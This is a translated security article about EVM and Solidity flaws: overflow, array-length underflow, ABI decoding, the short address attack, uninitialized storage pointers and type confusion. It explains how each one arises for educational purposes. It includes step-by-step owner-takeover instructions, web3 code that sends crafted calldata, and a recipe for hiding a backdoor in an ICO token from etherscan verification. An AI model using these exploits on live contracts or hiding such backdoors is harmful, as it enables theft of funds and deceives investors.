
Attention! S in Ethereum stands for Security. Part 2. EVM features


This is the second part of our series on typical vulnerabilities, attacks and problem areas inherent in Solidity smart contracts and in the Ethereum platform as a whole. Here we look at some features of the EVM and the vulnerabilities they can turn into.


In the first part we discussed the front-running attack, various random number generation algorithms, and network resilience under Proof-of-Authority consensus. The list here is even longer, and every item bears directly on smart contracts. So let's go.


Overflow / underflow


Overflow and underflow in the EVM are possible for int and uint types of any width, and with many operations.
It looks like this:


    contract _flow {
        uint public umax = 2**256 - 1;
        uint public umin = 0;
        int public max = int(~((uint(1) << 255)));
        int public min = int((uint(1) << 255));

        function overflow() {
            umax++;
            max++;
            // the same happens with += 1;
            // the same happens with *= 2;
        }

        function underflow() {
            umin--;
            min--;
            // the same happens with -= 1;
        }
    }

This shows up very often in public smart-contract repositories, because there is always some balance, cap or price that something is added to, multiplied by, divided by, and so on. A good practice is to use a SafeMath library for the data type you are working with. Keep in mind that Zeppelin's SafeMath is implemented only for uint!
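The wrap-around is easy to reproduce off-chain. The sketch below models 256-bit arithmetic with JavaScript BigInt. The helper names are illustrative, and `safeAdd` is a hypothetical function that only mirrors the idea behind SafeMath (fail instead of wrapping); it is not the library's actual code.

```javascript
// Model EVM uint256 / int256 arithmetic with BigInt (illustrative only).
const UINT_MAX = 2n ** 256n - 1n;
const INT_MAX = 2n ** 255n - 1n;
const INT_MIN = -(2n ** 255n);

// Unchecked operations wrap modulo 2**256, as in the EVM.
const addUint = (a, b) => BigInt.asUintN(256, a + b);
const subUint = (a, b) => BigInt.asUintN(256, a - b);
const addInt = (a, b) => BigInt.asIntN(256, a + b);
const subInt = (a, b) => BigInt.asIntN(256, a - b);

// Hypothetical checked addition: throw instead of wrapping.
function safeAdd(a, b) {
  const c = addUint(a, b);
  if (c < a) throw new Error("uint256 overflow");
  return c;
}

console.log(addUint(UINT_MAX, 1n) === 0n);      // umax++ wraps to zero
console.log(subUint(0n, 1n) === UINT_MAX);      // umin-- wraps to 2**256 - 1
console.log(addInt(INT_MAX, 1n) === INT_MIN);   // max++ wraps to the minimum
console.log(subInt(INT_MIN, 1n) === INT_MAX);   // min-- wraps to the maximum
```

With a checked helper, `safeAdd(UINT_MAX, 1n)` throws, while the unchecked `addUint` silently returns zero.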


One more thing. It may not be obvious, but uint is also used for array.length, which can be overflowed in exactly the same way. Consider this example:


    contract Array {
        uint[] public array;
        address public owner;

        function Array() {
            owner = msg.sender;
            array.push(0xaa);
        }

        function underflow() {
            array.length--;
        }

        function modify(uint index, uint value) {
            array[index] = value;
        }
    }

As you can see, there are no functions to change the owner , but anyone can become the owner.


Just tell me how

First, a word about storage. Storage is an address space of 2 ** 256 cells (slots), each 32 bytes in size. Simple types are placed directly in a slot, so they can be read by key. Complex types such as arrays use hashing: the first slot belonging to the array holds its length, and the data itself is laid out sequentially starting at the key keccak256(<number of the slot that holds the length>). Storage keeps data between transactions (function calls), like a kind of hard drive.


So, on to the exploit:


  1. Call underflow until the length wraps around and becomes 2 ** 256 - 1 (twice here, because the constructor pushes one element).
  2. Storage belongs to the contract, and its address space also has 2 ** 256 slots, so the array now covers it completely. The owner is still in its place, but it can now be reached through some array index.
  3. Calculate this index:


     hex(2**256 - 0xbabecafe + 1) 

    where 0xbabecafe stands for keccak256 of the number of the slot that stores the array length (slot 0 in this example), that is, the key at which the array data begins, and 1 is the number of the slot that stores owner.


  4. Call modify :
    • index is the value obtained in step 3.
    • value is the new address for owner. It does not matter that the function accepts a uint: an address is a number too :)
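The index from step 3 can be worked out off-chain. In the sketch below all names are illustrative, and `DATA_START` is an assumption: it is the commonly cited keccak256 of the 32-byte encoding of 0, hard-coded because Node.js has no built-in keccak256. Recompute it with a library you trust before relying on it.

```javascript
const MOD = 2n ** 256n; // size of the storage key space

// Assumed constant: keccak256 of slot number 0, where the length of `array` lives.
const DATA_START =
  0x290decd9548b62a8d60345a988386fc84ba6bc95484008f6362f93160ef3e563n;
const OWNER_SLOT = 1n; // `owner` is declared right after `array`

// array[index] lives at (DATA_START + index) mod 2**256, so solve for index.
function indexForSlot(targetSlot) {
  return (((targetSlot - DATA_START) % MOD) + MOD) % MOD;
}

const index = indexForSlot(OWNER_SLOT);
console.log("0x" + index.toString(16)); // pass this as `index` to modify()

// Sanity check: the computed element really maps onto the owner slot.
console.log((DATA_START + index) % MOD === OWNER_SLOT);
```

The modular form is the same expression as 2**256 - keccak256(0) + 1 from the text, written so that it also works for other target slots.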

You can read more about this example in solidity_tricks .


ABI encoding / decoding


First, note that to call a smart contract function through a transaction, you must put its signature (the 4-byte selector) in tx.data, followed by the arguments the function takes. Details on how each type is encoded can be found in the documentation.


Two points need to be taken into account:



When called, the function fetches its arguments with the calldataload instruction, and only then runs its main logic. Consider how different dynamic types behave, using an example:


    contract DynamicTypes {
        uint public strLength;
        uint public bytsLength;
        uint public arrayLength;

        string public str;
        bytes public byts;
        address[] public array;

        // stores every argument together with the length the EVM decoded for it
        function callme(string _str, bytes _byts, address[] _array) public {
            strLength = bytes(_str).length;
            str = _str;

            bytsLength = _byts.length;
            byts = _byts;

            arrayLength = _array.length;
            array = _array;
        }
    }

Call the callme function with the following code:


    var modifiedArgs = [
        // function selector: bytes4(sha3("callme(string,bytes,address[])"))
        '0x5fc059fd',
        // offset to the start of _str
        '0000000000000000000000000000000000000000000000000000000000000060',
        // offset to the start of _byts
        '00000000000000000000000000000000000000000000000000000000000000a0',
        // offset to the start of _array
        '00000000000000000000000000000000000000000000000000000000000000e0',
        // length of _str declared as 64, although the real data is shorter!
        '0000000000000000000000000000000000000000000000000000000000000040',
        // the string itself: "AAAA", only 4 bytes
        '4141414100000000000000000000000000000000000000000000000000000000',
        // length of _byts declared as 64, although the real data is shorter!
        '0000000000000000000000000000000000000000000000000000000000000040',
        // the data itself: 3 bytes, 0x42 0x43 0x44
        '4243440000000000000000000000000000000000000000000000000000000000',
        // length of _array declared as 64, although only 2 elements follow!
        '0000000000000000000000000000000000000000000000000000000000000040',
        // first element
        '0000000000000000000000000000000000000000000000000000000000000001',
        // second element
        '0000000000000000000000000000000000000000000000000000000000000002'
    ];
    var modifiedData = modifiedArgs.join("");

    // send the hand-built calldata as-is, so that the arguments are not re-encoded
    var tx = web3.eth.sendTransaction({
        "to" : contractAdd,
        "data" : modifiedData,
        "gas" : 1185919
    });

After the transaction is processed, we will see the following picture:


As you can see, the string is not actually "AAAA" (the @ at the end is how 0x40, the length of _byts, is rendered), byts holds not three bytes, as in the data that was sent, but 64 (it likewise picked up the 0x40 from the next argument), and we can freely read the 64th element of array. So, to fetch the data, the EVM takes the declared length, cuts that many bytes out of tx.data and passes them to the function. It does not matter that the next argument has already begun or that tx.data has ended: the missing bytes are padded with zeros :)
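To see where the stray bytes come from, the decoding can be replayed off-chain. The sketch below is a simplified model of how arguments were read from calldata at the time, not the code the compiler actually generates. All helper names are illustrative, and the calldata is the argument area of the crafted call above, without the selector.

```javascript
const num = (h) => h.padStart(64, "0"); // left-padded integer word
const raw = (h) => h.padEnd(64, "0");   // right-padded byte data

const calldata = Buffer.from(
  [
    num("60"), num("a0"), num("e0"), // offsets of _str, _byts, _array
    num("40"), raw("41414141"),      // _str: declared length 64, data "AAAA"
    num("40"), raw("424344"),        // _byts: declared length 64, data 3 bytes
    num("40"), num("01"), num("02"), // _array: declared length 64, 2 elements
  ].join(""),
  "hex"
);

// Read `size` bytes at `offset`; bytes past the end of calldata read as zero.
function read(offset, size) {
  const out = Buffer.alloc(size); // zero-filled
  for (let i = 0; i < size; i++) {
    if (offset + i < calldata.length) out[i] = calldata[offset + i];
  }
  return out;
}
const readWord = (offset) => BigInt("0x" + read(offset, 32).toString("hex"));

// Decode a string/bytes argument, trusting the length the caller declared.
function decodeBytes(headIndex) {
  const offset = Number(readWord(32 * headIndex));
  const length = Number(readWord(offset));
  return read(offset + 32, length);
}

// Read element i of an array argument, with no check against the real data.
function arrayElement(headIndex, i) {
  const offset = Number(readWord(32 * headIndex));
  return readWord(offset + 32 + 32 * i);
}

const str = decodeBytes(0);
const byts = decodeBytes(1);
console.log(str.length, str[63].toString(16));   // 64 bytes, the last one is 0x40
console.log(byts.length, byts[63].toString(16)); // 64 bytes, the last one is 0x40
console.log(arrayElement(2, 63));                // past the end of calldata: zero
```

The 64-byte window for _str runs into the length word of _byts, which is why the decoded string ends in 0x40, the character @.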


Continuing the topic, let's talk about the Short address attack.


    contract ERC20 {
        address public who;
        uint public value;

        function transfer(address _who, uint _value) public {
            who = _who;
            value = _value;
        }
    }

The contract has little in common with a real ERC20 token; what matters is that its transfer function has the same signature as the original. The Short address attack scenario is as follows:



Call transfer :


    // defaultArgs is what an honest call looks like, modifiedArgs is the attack
    var defaultArgs = [
        '0xa9059cbb',
        // recipient address ending in a 0x00 byte
        '0000000000000000000000003a0c7287b9aac3c71ee8b9048c5dfb989f2a4d00',
        // value: 1 token
        '0000000000000000000000000000000000000000000000000000000000000001'
    ];

    var modifiedArgs = [
        '0xa9059cbb',
        // the same address with the trailing zero byte dropped
        '0000000000000000000000003a0c7287b9aac3c71ee8b9048c5dfb989f2a4d',
        '0000000000000000000000000000000000000000000000000000000000000001'
    ];
    var modifiedData = modifiedArgs.join("");

    var tx = web3.eth.sendTransaction({
        "to" : contractAdd,
        "data" : modifiedData,
        "gas" : 1185919
    });

The missing zero byte at the end of the address is taken from value (the arguments are parsed from left to right), and the EVM pads value itself back up to 32 bytes (again with a zero byte). In other words, value is shifted left by one byte and becomes 256 tokens (0x100), although the user wanted to transfer only 1. In the general case:


$$\text{value}_{\text{received}} = \text{value}_{\text{sent}} \cdot 2^{8z}$$


where z is the number of zero bytes dropped from the end of the address (there may be 2, 3, and so on).
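The shift can be checked off-chain with a small model of the decoding: fixed 32-byte windows, with zeros appended when the calldata is too short. The function and variable names below are illustrative; the selector and the address are the ones from the example above.

```javascript
const SELECTOR = "a9059cbb"; // transfer(address,uint256), as in the example
const word = (h) => h.padStart(64, "0");

// Decode (address, uint256) from hex calldata, padding short input with zeros.
function decodeTransfer(dataHex) {
  const args = dataHex.slice(SELECTOR.length).padEnd(128, "0");
  return {
    who: "0x" + args.slice(24, 64),            // low 20 bytes of the first word
    value: BigInt("0x" + args.slice(64, 128)), // the second word
  };
}

const address = "3a0c7287b9aac3c71ee8b9048c5dfb989f2a4d00";
const normal = SELECTOR + word(address) + word("1");
// Attack: drop the trailing zero byte of the address (z = 1).
const short = SELECTOR + word(address).slice(0, -2) + word("1");

console.log(decodeTransfer(normal).value); // the intended amount
console.log(decodeTransfer(short).value);  // shifted left by one byte
console.log(decodeTransfer(short).who === decodeTransfer(normal).who);
```

The recipient comes out unchanged because the borrowed byte is the leading zero of value, while value itself gains a trailing zero byte and is multiplied by 2 ** 8.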


It is worth noting that although the attack is called the Short address attack, that is only a special case. It does not have to involve an address or the transfer function, nor the uint type of value. All three components can be changed arbitrarily, extending the classic idea of the short address attack. Moreover, the word Short also describes only a special case: the attacker can supply an address that is longer than usual, so the extra bytes become the start of value and its end is cut off, that is, the shift goes to the right.


Uninitialized storage pointer


This problem has already been covered on Habr, so we will only touch on it briefly. To understand it, keep two points in mind:



Now an example:


    contract Uninitialized {
        address public owner;   // lives in Storage (slot 0), value 0x00
        uint public balance;    // lives in Storage (slot 1), value 0

        struct Billy {
            address where;
        }

        function rewriteOwner(address _where) public {
            Billy tmp;          // uninitialized pointer to Storage, refers to slot 0
            tmp.where = _where;
        }

        function rewriteBoth(bytes s) public {
            uint8[64] copy;     // uninitialized pointer to Storage, refers to slot 0
            for (uint8 i = 0; i < 64; i++)
                copy[i] = uint8(s[i]);
        }
    }

When the contract is deployed, the variables owner and balance are initialized to their default values, and there is no explicit code to change them. Yet it is possible. If you call rewriteOwner with an address, the assignment tmp.where = _where also overwrites owner. This happens because tmp is a reference type whose data location is not explicitly specified, so by default tmp refers to Storage, and specifically to slot zero.


The situation is exactly the same for the copy array in rewriteBoth; we mention it to show that Storage slots follow one another, and if the 32 bytes of slot zero are not enough, the next slot is overwritten, and so on.
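The spill from slot zero into slot one can be pictured with a toy model of storage. The sketch assumes that 32 one-byte elements are packed into each slot, lowest-order byte first, and that the array's storage pointer is slot 0; the names `storage` and `writeCopy` are illustrative.

```javascript
// Toy model of contract storage: slot number -> 32-byte value (as BigInt).
const storage = new Map([
  [0n, 0n], // owner
  [1n, 0n], // balance
]);

// Write element i of a uint8[64] whose storage pointer is slot 0.
// Assumption: 32 elements per slot, packed from the lowest-order byte up.
function writeCopy(i, byte) {
  const slot = BigInt(Math.floor(i / 32));
  const shift = BigInt((i % 32) * 8);
  const cleared = (storage.get(slot) ?? 0n) & ~(0xffn << shift);
  storage.set(slot, cleared | (BigInt(byte) << shift));
}

const s = Buffer.alloc(64, 0xff); // attacker-controlled input
for (let i = 0; i < 64; i++) writeCopy(i, s[i]);

console.log(storage.get(0n).toString(16)); // slot of owner, fully overwritten
console.log(storage.get(1n).toString(16)); // slot of balance, fully overwritten
```

Elements 0 to 31 land in the slot of owner and elements 32 to 63 in the slot of balance, so one call rewrites both variables.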


To prevent this from happening, there are two options:



Type confusion


The next feature concerns how the EVM handles types. There are no type checks at run time; they all happen at the compiler level. And, as we saw in the examples above, functions are called by signature, and if the signature is not found, the fallback function is called.


Let's look at this using the epic fight from The Matrix. Suppose the characters in the Matrix are smart contracts (Neo and Smith). For convenience, each of them has declared an abstract contract for interacting with the other (pure syntactic sugar):


    // Smith's side of the fight

    /* Interface for Neo, as Smith believes it to be */
    contract Neo {
        function obtainDamage (uint256 value);
    }

    // Smith's own contract
    contract Smith {
        uint public health = 100;

        function doDamage (address who) {
            Neo(who).obtainDamage(100); // call obtainDamage on the Neo contract
        }

        function obtainDamage (uint256 value) {
            health -= value;
        }
    }

And here is the contract that plays the role of Neo:


    /* Interface for Smith */
    contract Smith {
        function obtainDamage (uint256 value);
    }

    contract Neo {
        uint8 public health = 100;

        function () {
            Smith(msg.sender).obtainDamage(100);
        }

        function obtainDamage (uint8 value) {
            health -= value;
        }
    }

Both deploy their contracts to the Matrix network, learn each other's addresses, and the battle begins:



Why did it happen?

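Let's take a closer look at the obtainDamage function in the Neo contract. Its selector is actually bytes4(sha3("obtainDamage(uint8)")) == 0x1f26cd3a, because the type of value is different. Smith's call carries the selector of obtainDamage(uint256), which Neo does not have, so Neo's fallback function runs instead and returns the 100 damage to Smith.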
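The fight can be replayed with a toy dispatcher. Real contracts dispatch on the first four bytes of the hash of the signature; the sketch below uses the signature string itself as the key, which is enough to show the mismatch. The `call` helper and the object layout are illustrative and do not model the EVM in any detail.

```javascript
// Toy dispatcher: find the function by signature, else run the fallback.
function call(sender, target, signature, ...args) {
  const fn = target.functions[signature] || target.fallback;
  if (fn) fn(sender, ...args);
}

const smith = {
  health: 100,
  functions: {
    // Smith's interface for Neo promises obtainDamage(uint256).
    "doDamage(address)": (sender, who) =>
      call(smith, who, "obtainDamage(uint256)", 100),
    "obtainDamage(uint256)": (sender, value) => {
      smith.health -= value;
    },
  },
};

const neo = {
  health: 100,
  functions: {
    // The deployed Neo declares uint8, so its signature is different.
    "obtainDamage(uint8)": (sender, value) => {
      neo.health -= value;
    },
  },
  // Fallback: hit back at whoever made the call.
  fallback: (sender) => call(neo, sender, "obtainDamage(uint256)", 100),
};

call(null, smith, "doDamage(address)", neo);
console.log(smith.health, neo.health); // 0 100
```

Smith's attack never reaches Neo's obtainDamage: the lookup fails, the fallback answers, and Smith takes his own 100 damage.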


And now a trick question. How would you implement a backdoor in a real ICO, Crypto<put animals here>, and the like?
Answer

Consider the example of an ICO. An ICO usually has two contracts: the ERC20 token and the Crowdsale. The backdoor is placed in the token contract: for example, add a function scoopAndDisappear.


  • after deployment, publish on etherscan only the source code of the crowdsale, which will also include the token contract, but with the backdoor, of course, cut out
  • for the token's address, do not submit anything, and if anyone asks, answer something like: "the token contract is already there in the crowdsale".

This works because etherscan compiles the source file it was given and compares the resulting bytecode with what was in the contract creation transaction. If they match, everything is fine. And they will match, because the token contract is needed there only to build the correct signatures for calls (the token's bytecode itself is not included).


Therefore it is important that developers publish on etherscan.io the source code of all contracts used in the project. The only exception is when one contract creates another (with the new construct). In that case the created contract's actual bytecode is indeed part of the creator's bytecode.


And here is another example of a backdoor, a situation that arises from people's inattention.


That's all for today. In the next installment we will move on to Solidity itself and see how it differs from other programming languages.



Source: https://habr.com/ru/post/346408/

